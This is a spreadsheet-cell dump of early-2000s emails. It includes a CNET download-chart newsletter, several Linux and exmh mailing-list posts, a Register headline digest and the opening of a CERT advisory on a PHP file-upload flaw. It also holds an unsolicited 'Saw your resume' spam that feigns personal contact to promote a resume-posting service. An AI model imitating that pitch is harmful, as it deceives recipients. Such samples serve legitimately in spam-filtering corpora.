 &lt;TD width="13%"&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&amp;nbsp;&amp;nbsp;&lt;B&gt;Last&lt;BR&gt;&amp;nbsp;&amp;nbsp;Week&lt;/B&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="16%"&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&amp;nbsp;&amp;nbsp;&lt;B&gt;Weeks&lt;BR&gt;&amp;nbsp;&amp;nbsp;on&amp;nbsp;Chart&lt;/B&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="26%"&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&amp;nbsp;&amp;nbsp;&lt;B&gt;Downloads&lt;BR&gt;&amp;nbsp;&amp;nbsp;This
 Week&lt;/B&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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
 1&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left width="39%"&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c3-x1yCQJLx-Q6KWjVZ5znP-FdWuuFR" &gt;Microsoft
 Java Virtual Machine&lt;/A&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 4&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 83&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 12,047&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colSpan=5&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;
 &lt;TD height=65&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 2&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d8-XW73QWLWIvIOdvlmkSWreAgRDc9R" &gt;Microsoft
 Windows Installer (95/98/Me)&lt;/A&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 1&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 83&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 10,817&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt; &lt;TD colSpan=5&gt;&lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;&lt;TR&gt; &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;
 &lt;TD height=32&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 3&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgVq7Y6kp64xv3orMjEsaQuR" &gt;Microsoft
 Data Access Components RTM&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 3&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 83&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 9,911&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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4&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=02-qia9Ilj8-YNO18Y_XGuwrfzJ6nsR" &gt;Java 2
 Runtime Environment, SE&lt;/A&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 2&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 83&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 9,685&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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5&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=17-agitI5XrfbdnSbRIz4s1RhjGRsZR" &gt;Visual Basic
 6.0 Runtime Module SP5&lt;/A&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 5&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 72&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 8,243&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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6&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=2c-DatOIc0D7XN5_bGc-r7MBvWpjudR" &gt;ActiveX Control Pad
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 8&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 6&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 3,740&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;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7&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKImGOrPmMU5CfCkxHB0FrR" &gt;Mozilla (32-bit)
 &lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD width="13%"&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 7&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width="16%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 4&lt;/FONT&gt;&lt;/TD&gt;&lt;TD width="26%"&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 3,071&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt; &lt;TD colSpan=5&gt;&lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;&lt;TR&gt; &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;
 &lt;TD height=32&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 8&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=56-NwKYInns9Y65Uu3rctPQDwwaMCiR" &gt;Microsoft Windows Installer (Windows NT/2000)&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 9&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 36&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 2,411&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colSpan=5&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;&lt;TD
 height=32&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 9&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6c-SUL3IuPjjWx_rMKKQCL5-NPyEdnR" &gt;Borland C++ Compiler&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 10&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 59&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 2,356&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colSpan=5&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR align=middle&gt;&lt;TD
 height=32&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 10&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD align=left&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=81-z1IaQ-KBrR8vh2ApqfRO9R6BpKcR" &gt;Java 2 Development Kit&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 14&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva" size=-2&gt;
 83&lt;/FONT&gt;&lt;/TD&gt;
 &lt;TD&gt;&lt;FONT face="ms sans serif, geneva"
 size=-2&gt;
 2,144&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD colSpan=5&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#cccccc&gt;&lt;IMG height=1
 src="http://www.cnet.com/b.gif"
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;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href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;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HREF='http://clickthru.online.com/Click?q=96-pjcWrwdzdRody8Z6ZfmfGEsvn8jBSdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=ab-ZcQKQYpdY4hnfweXydit0M-0OvFR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=c0-kfs-QWP2zC4NcYX41H99K8FZuS9R"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href="http://clickthru.online.com/Click?q=d5-p-viQzL1adB7YEjHCu4jNix1DPuR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ea-fjLyQhV4NaEvrN7AwQ4lAUw-5WsR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ff-sVoVQms4e4yyiCiZxrhBm0WHthZR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=15-mYP_IGck_EAqKwaAV-hDEc2lRbuR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=2a-CNuWIrIPI7v5OWqabman8WccrYsR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=3f-4sAEIqMW4q6yBnLHcoh57BymNzZR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e416&amp;ISSUE=2002-07-10" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=54-l6HvnFKl72aBaxFPgshG_9W1z9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Re: [SAdev] 2.40 RELEASE PROCESS: mass-check status, folks?
</t>
  </si>
  <si>
    <t xml:space="preserve">I think with the confusion and all, we should give these folks 
 until the end of the day to get fixed logs uploaded :)
 Justin, on a related note -- I didn't include the spamtrap stuff 
 from the corpus directory on your server in my logs, but that 
 should definitely be in there -- don't know if you'd included it 
 in yours or not.  I think it's from Kelsey's mailtraps...
 C
 On Thursday, August 22, 2002, at 09:49  AM, Justin Mason wrote:
 &gt; Files that are out of date (as far as I can tell -- they have no date
 &gt; comment), and will be ignored:
 &gt;
 &gt;         nonspam-danielp.log
 &gt;         nonspam-danielr.log
 &gt;         nonspam-duncan.log
 &gt;         nonspam-james.log
 &gt;         nonspam-laager.log
 &gt;         nonspam-messagelabs.log
 &gt;         nonspam-msquadrat.log
 &gt;         nonspam-olivier.log
 &gt;         nonspam-oliviern.log
 &gt;         nonspam-quinlan.log
 &gt;         nonspam-rodbegbie.log
 &gt;         nonspam-sean.log
 &gt;         nonspam-theo.log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</si>
  <si>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
 &gt;&gt;&gt;Robert Elz said:
  &gt; I kind of doubt that any pre built-in sequence name is going to be
  &gt; very general.   Even "unseen" can be changed (fortunately that one
  &gt; is easy to find in the MH profile - though whether exmh does that,
  &gt; os just uses "unseen" I haven't bothered to find out).
 exmh uses the profile setting - it appears as mhProfile(unseen-sequence)
 in the code.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</si>
  <si>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Subject: Automotive software Easter Egg discovered
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85506836
 Date: Not supplied
 Slashdot's reporting that according to the current ish of Popular Science, an 
 Easter Egg has been discovered in the transmission control software for the BMW 
 M3: 
     ...the proper combination of commands to the electronically controlled 
     manual transmission will cause the car to rev up to 4000rpm and drop the 
     clutch... 
 Are we sure that this is a feature and not a bug? Link[1] Discuss[2]
 [1] http://slashdot.org/article.pl?sid=02/09/29/2232249&amp;mode=flat&amp;tid=126
 [2] http://www.quicktopic.com/boing/H/SVZhehqjGbC
</t>
  </si>
  <si>
    <t xml:space="preserve">Adam Beberg:
 &gt;Considering 90% of the fake job posting I see are for embedded systems or 
 &gt;device drivers - C still rules the world.
 There is a lot of C++ in the embedded world. With
 static object allocation and a few other programming
 techniques, performance differences disappear, but
 C++ gives a boost in development and maintainability.
 The real issue is compiler availability. Almost every
 embedded platform has C cross-compilers. Many have
 C++ compilers. But there is still a range of
 platforms that have the first but not the second. Or
 at least, that was the story a few years ago.
 _________________________________________________________________
 Send and receive Hotmail on your mobile device: http://mobile.msn.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Reg Headlines Tuesday July 16
</t>
  </si>
  <si>
    <t xml:space="preserve">Today's Headlines from The Register
 -----------------------------------
     To unsubscribe from this daily news update, see the instructions at
     the end of this message.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Software
     Preinstalled Mandrake Linux PCs go live at Walmart
     Will the public love them?
         http://www.theregister.co.uk/content/4/26192.html
     Confirmed: MS to ship beefed up 802.11 security in XP SP1
     Surely not a reason to upgrade from Win2k? You amaze us...
         http://www.theregister.co.uk/content/4/26188.html
 Enterprise Systems
     Citrix to pink slip 10 per cent
     Decimation, 21st century style
         http://www.theregister.co.uk/content/53/26186.html
 Personal Hardware
     PC prices plummet in Europe
     No Mercy
         http://www.theregister.co.uk/content/54/26180.html
 Semiconductors
     Mobile Athlon, AMD fanboy spat, Intel price cuts
     HWRoundupFunny underdog
         http://www.theregister.co.uk/content/3/26194.html
 Internet
     Webmaster conference held in London pub
     We'll drink to that
         http://www.theregister.co.uk/content/6/26193.html
 Net Security
     Security industry's hacker-pipming slammed
     Somebody had to say it
         http://www.theregister.co.uk/content/55/26198.html
     PGP Vuln exposed  by Outlook plug-In
     Pretty Poor Privacy?
         http://www.theregister.co.uk/content/55/26184.html
 Business
     Interoute buys part of Ebone
     Etc
         http://www.theregister.co.uk/content/7/26196.html
     Vodafone sues Daily Telegraph for libel
     Very short story
         http://www.theregister.co.uk/content/7/26191.html
     Vallance recounts WorldCom war stories
     From 'mug' to 'smug'
         http://www.theregister.co.uk/content/7/26189.html
     Archie Norman lined up for Energis as banks take over
     Poisoned Chelys?
         http://www.theregister.co.uk/content/7/26187.html
     Another year of telco turmoil - C&amp;W
     Toimurl, if you're from Brooklyn
         http://www.theregister.co.uk/content/7/26182.html
 e-business
     E-business lives on, says EDS 
     Poke it with a stick and see if it moves
         http://www.theregister.co.uk/content/23/26197.html
     Liberty Alliance proposes Web security standards 
     LAP dancing at the OASIS
         http://www.theregister.co.uk/content/23/26183.html
 Site News
     Reg Cancer Busters donates 1,000 years
     Site News Reg SETI@Home team regroups
         http://www.theregister.co.uk/content/31/26190.html
     Eclipse in broadband promo
     Reg reader offer
         http://www.theregister.co.uk/content/31/26185.html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</si>
  <si>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Matthias Haase wrote:
 &gt; The bytecode-interpreter *is* disabled on RH8, defined at line 3 in
 &gt; the Specfile of the SRPM.
 Right you are.  The SRPM includes a patch to enable it, but then the
 specfile defaults to not applying that patch.  I saw the former but
 missed the later.  Egad, what a convoluted maze.
 Sorry for the misinformation!
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
 In a message dated 7/23/2002 8:51:00 PM, joe@barrera.org writes:
 &gt;Okay, here's a joke I *just* made up while I was driving my car at home:
 Joe, I think you need a new car with more leg room
 Tom
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [zzzzteana] FWD (SK) Japanese tentacle porn [was Re: Com'on Baby, Lite my Fire]
</t>
  </si>
  <si>
    <t xml:space="preserve">Terry W. Colvin fwded:
 &gt;"Leonard R. Cleavelin" wrote:
 &gt;&gt;Scat I have, unfortunately, run across. But this is the second reference I've
 &gt;&gt;seen in as many weeks to "Japanese tentacle porn", which is a genre I've
 &gt;&gt;lived in complete (and probably blissful) ignorance of until now. Unless it's
 &gt;&gt;going to gross out a significant percentage of the readership of the list,
 &gt;&gt;can we have a definition/description? Some of us lead sheltered lives.
 &gt;
 &gt;&lt; http://www.abcb.com/ency/t/tentacle.htm &gt;
 &gt;
 &gt;Now, isn't your life just SOOOO much more enriched?
 &gt;
 &gt;Dave Palmer
 Not a new Japanese genre either - check out Hokusai's "Dream of the 
 Fisherman's Wife" (at &lt;http://cryptozoo.monstrous.com/octopus1.htm&gt; 
 and you don't want to know how many waves and views of Mt Fuji I had 
 to wade through to find that for you discerning connoisseurs).
 Rachel
 -- 
 "The banana is also the safest pistol from the assassin's point of view.
 Bystanders are unlikely to intervene when one person chases another down
 the street brandishing a banana. Indeed, they may not believe that they
 saw it."              _Killer, the Game of Assassination_, Steve Jackson
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] app of the day - Spackle
</t>
  </si>
  <si>
    <t xml:space="preserve">http://spackle.xidus.net/info.php
 &gt;&gt;From the website:
 "Spackle is designed to be a flexible client/server architecture for the 
 gathering and displaying of statistics, primarily suited to monitoring 
 servers. It's written in PHP and bash shell script, uses RRDtool  for stats 
 logging, and PostgreSQL for the server-side database. (soon to support MySQL 
 as well)"
 I had this up and running within a few hours. The hardest bit was getting 
 PostgreSQL running as it's been a few years since I used it. I had a bit of a 
 problem getting it to work on rh6.2 boxes but I documented the changes here: 
 http://xeer.blogspot.com/?/2002_07_01_xeer_archive.html#79148596
 Web interface is simple, but functional. It has a simple way of distributing 
 the monitoring scripts (which could be compromised but I digress), and the 
 resulting graphs are pretty!
 Donncha.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: . jif
</t>
  </si>
  <si>
    <t xml:space="preserve">.
 ukqdrblkougooeoffnxsmbowei
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Saw your resume. . . .
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi There,
 I recently came across a copy of your resume I found on the 
 internet. In case you're back on the market, you should check
 out this new web service that instantly posts your resume to
 over 75 career websites.
 You fill out one online form and immediately you can be seen
 by over 1.5 million employers and recruiters daily! It works.
 In about 15 minutes you'll be posted to all the major sites
 like: Monster, CareerBuilder, HotJobs, Dice, Job.com and
 more. It'll save you 60 hours in research and data entry.
 Check out http://start.resumerabbit.com - I think you'll
 like it. You don't even need a current resume.
 It's a tough job market right now. So if you've got a good
 job hold on to it. But these days it's smart to have a few
 irons in the fire too. That only happens by being in all the
 right places at all the right times. So even if you do it by
 hand, get maximum exposure and be found on as many career
 sites as possible.
 Just food for thought!
 Best Wishes,
 Elizabeth Bradley
 Manager
 elizibeth-bradley@allexecs.org
 ========================================================
 The staff of AllExecs.org have years of recruiting
 experience and may from time to time send you a
 review of a career tool that has helped others in their
 job search.  If you'd rather not receive these reviews,
 reply to this note with "Remove" in the subject line.
 ========================================================
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] OffTopic: PS2 Mod-chip installation... can anyone do it?
</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry i know this is off topic:
 Ive recently gotton my hands on a mod chip for my PS2 and its needs to be
 solderd into the PS2, but i have never solderd before and the guy i got it
 off reccomended that i do not attempt to install it my self... if anyone can
 do it or knows someone who can e-mail me at kiall@redpie.com. DO NOT REPLY
 TO THIS LIST... once again sorry for the OT...
 Kiall Mac Innes
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Wow, three replies already, all recommending ssh. Thanks!
 - Joe
 Back in my day, they didn't have ssh. Then again, back in my day,
 they didn't have firewalls. And I still miss X10's active icons.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: exmh bug?
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_9304186P
 Content-Type: text/plain; charset=us-ascii
 On Wed, 11 Sep 2002 12:17:33 PDT, Brent Welch said:
 &gt; &gt;&gt;&gt;Hacksaw said:
 &gt;  &gt; When I receive a gpg encrypted message, and it asks me for a passphrase, 
 &gt; it
 &gt;  &gt; first tries to ask me via the tty under which exmh is running. It tells 
 &gt;
 Hmm.. I've seen the *opposite* issue - if I go to *SEND* a signed message,
 sometimes Exmh will put up the dialog box, but fail to set keyboard focus
 there, so no passphrase can be entered.  Of course, hitting 'return' doesnt
 work so you need to click the 'OK' box, at which point it finds that the
 passphrase that wasn't entered doesn't work, and asks again, this time with
 proper focus set.
 I suspect some variable/codepath is getting hosed for the focus, or possibly
 some borkedness with --no-tty and/or --status-fd flags to gnupg.
 /Valdis
 --==_Exmh_9304186P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 Comment: Exmh version 2.5 07/13/2001
 iD8DBQE9f575cC3lWbTT17ARApK5AKD+PToDpgdcd0Ore2BwJ1qVakfMDgCcDRsa
 HqcPiRZRSxFvAQBe+Ma1qmY=
 =lXe4
 -----END PGP SIGNATURE-----
 --==_Exmh_9304186P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CERT Advisory CA-2002-21 Vulnerability in PHP
</t>
  </si>
  <si>
    <t xml:space="preserve">
 -----BEGIN PGP SIGNED MESSAGE-----
 CERT Advisory CA-2002-21 Vulnerability in PHP
    Original release date: July 22, 2002
    Last revised: --
    Source: CERT/CC
    A complete revision history can be found at the end of this file.
 Systems Affected
      * Systems running PHP versions 4.2.0 or 4.2.1
 Overview
    A  vulnerability  has been discovered in PHP. This vulnerability could
    be  used  by  a remote attacker to execute arbitrary code or crash PHP
    and/or the web server.
 I. Description
    PHP  is  a  popular  scripting  language  in  widespread use. For more
    information about PHP, see
           http://www.php.net/manual/en/faq.general.php
    The  vulnerability  occurs  in the portion of PHP code responsible for
    handling  file uploads, specifically multipart/form-data. By sending a
    specially  crafted  POST  request  to  the web server, an attacker can
    corrupt  the  internal  data  structures used by PHP. Specifically, an
    intruder  can  cause  an improperly initialized memory structure to be
    freed.  In  most  cases, an intruder can use this flaw to crash PHP or
    the  web  server. Under some circumstances, an intruder may be able to
    take  advantage  of  this  flaw  to  execute  arbitrary  code with the
    privileges of the web server.
    You  may  be  aware that freeing memory at inappropriate times in some
    implementations  of  malloc  and  free  does not usually result in the
    execution  of  arbitrary  code.  However, because PHP utilizes its own
    memory  management  system,  the  implementation of malloc and free is
    irrelevant to this problem.
    Stefan  Esser  of  e-matters  GmbH has indicated that intruders cannot
    execute   code   on   x86   systems.   However,  we  encourage  system
    administrators  to  apply  patches  on  x86  systems  as well to guard
    against denial-of-service attacks and as-yet-unknown attack techniques
    that may permit the execution of code on x86 architectures.
    This  vulnerability  was discovered by e-matters GmbH and is described
    in  detail  in  their  advisory.  The  PHP  Group  has  also issued an
    advisory.  A list of vendors contacted by the CERT/CC and their status
    regarding this vulnerability is available in VU#929115.
    Although   this  vulnerability  only  affects  PHP  4.2.0  and  4.2.1,
    e-matters  GmbH  has  previously  identified  vulnerabilities in older
    versions  of  PHP.  If  you  are  running  older  versions  of PHP, we
    encourage you to review
    http://security.e-matters.de/advisories/012002.html
 II. Impact
    A  remote  attacker can execute arbitrary code on a vulnerable system.
    An  attacker  may not be able to execute code on x86 architectures due
    to  the way the stack is structured. However, an attacker can leverage
    this  vulnerability  to  crash PHP and/or the web server running on an
    x86 architecture.
 III. Solution
 Apply a patch from your vendor
    Appendix A contains information provided by vendors for this advisory.
    As  vendors report new information to the CERT/CC, we will update this
    section  and note the changes in our revision history. If a particular
    vendor  is  not  listed  below,  we  have not received their comments.
    Please contact your vendor directly.
 Upgrade to the latest version of PHP
    If  a  patch  is  not  available  from your vendor, upgrade to version
    4.2.2.
 Deny POST requests
    Until  patches  or an update can be applied, you may wish to deny POST
    requests.  The  following  workaround  is  taken from the PHP Security
    Advisory:
      If  the  PHP  applications on an affected web server do not rely on
      HTTP POST input from user agents, it is often possible to deny POST
      requests on the web server.
